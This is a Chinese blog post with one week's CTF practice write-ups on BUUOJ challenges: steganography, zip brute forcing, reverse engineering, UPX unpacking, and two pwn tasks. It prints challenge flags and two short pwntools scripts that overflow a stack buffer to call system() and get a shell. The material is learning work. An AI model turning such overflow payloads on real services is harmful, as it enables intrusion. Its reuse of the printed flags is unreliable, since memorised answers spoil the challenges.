11.22 这周的CTF刷题

1.你竟然赶我走

给了个jpg

直接放到010editor

拉到最下面就有

flag{stego_is_s0_bor1ing}

 

2.大白

一张png

提示都给了

那么这么说的话直接修改一下图片长宽高就行

crc校验的知识可以课后补一下,简单说就是,图片会隐含一个crc的一串字符,和图片大小有关,大小改变,crc随之改变,通过特殊手段可以只显示一部分图片,此时,crc不变,但是图片大小改变 会报错。通过脚本即可还原全部图片

 还原后得到flag

3.有N种方法解决

解压附件

是一个exe,但是不能运行

kali file 命令识别一下,是一个txt

打开发现是一个base64 但是和图片ka'l有关系,考base64转图片

找个在线网站 

转换

再用网站扫描一下二维码就行

 KEY{dca57f966e4e4e31fd5b15417da63269}

4.乌镇峰会种图

其实题目不难

是个jpg图片

我以为要用stegsolve

然后找不到什么线索

然后看了一下照片属性,发现没有注释什么的

才20kb

直接在010editor打开

然后flag就在最后面

5.基础破解

非常基础

就是用软件暴力破解压缩包密码

提示已经给了

四位数字

然后就爆破出来了

解压

得到txt 然后base64解密即可

flag{70354300a5100ba78068805661b93a5c}

6.pwn1_sctf_2016

C++是真的看不懂 难受~~

查了wp

关键点是看似没有栈溢出,但是实则有个repalce的函数可以替换

将I替换成you实现栈溢出 然后再将原来的s重新赋值

总之就是很细节

然后利用栈溢出

加上原本程序里面有个system的函数

然后就编写payload了

from pwn import *
io = remote('node4.buuoj.cn', 29190)
payload = b'I'*20 + b'k'*0x4 + p32(0x8048F0D)#发送垃圾字符和函数地址
io.sendline(payload) 
io.interactive() 

7.jarvisoj_level0

一样的 栈溢出

溢出之后再加上对应的system函数的地址就行

拿到shell权限之后, 再寻找flag的相关文件就可以

上payload

from pwn import *
io=remote('node4.buuoj.cn', 25298)
payload = b'a'*(0x80+0x8) +p64(0x400596)
io.sendline(payload) 
io.interactive()

 

 

8.reverse 2

还是看wp写的 

代码分析有点问题

 wp说的是  25行 比较输入值和flag变量,结果为1就输出 right flag 说明flag变量就是存着flag

的值,然后查看flag

发现就是hacking_for_fun}

但是上面还有一个字符的替换 在第19行到第23行

(这里我根本看不懂 明明这个函数就在上面,为什么会影响到下面的s输入)

这里替换的机制就是将i和r换成1

所以flag是

flag{hack1ng_fo1_fun}

9.内涵的软件

ida32打开

 这里有一个DBAPP{49d3c93df25caad81232130f3d2ebfad}

还有非常像flag 

DBAPP替换flag

试一下

flag{49d3c93df25caad81232130f3d2ebfad}

没想到就直接ok了

有点意外

10、新年快乐

简单的脱壳

先查壳 

upx壳

使用的工具是  

 upx静态脱壳工具

脱壳即可

然后分析ida32里的内容

 分析一下就可以

flag{HappyNewYear!}

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值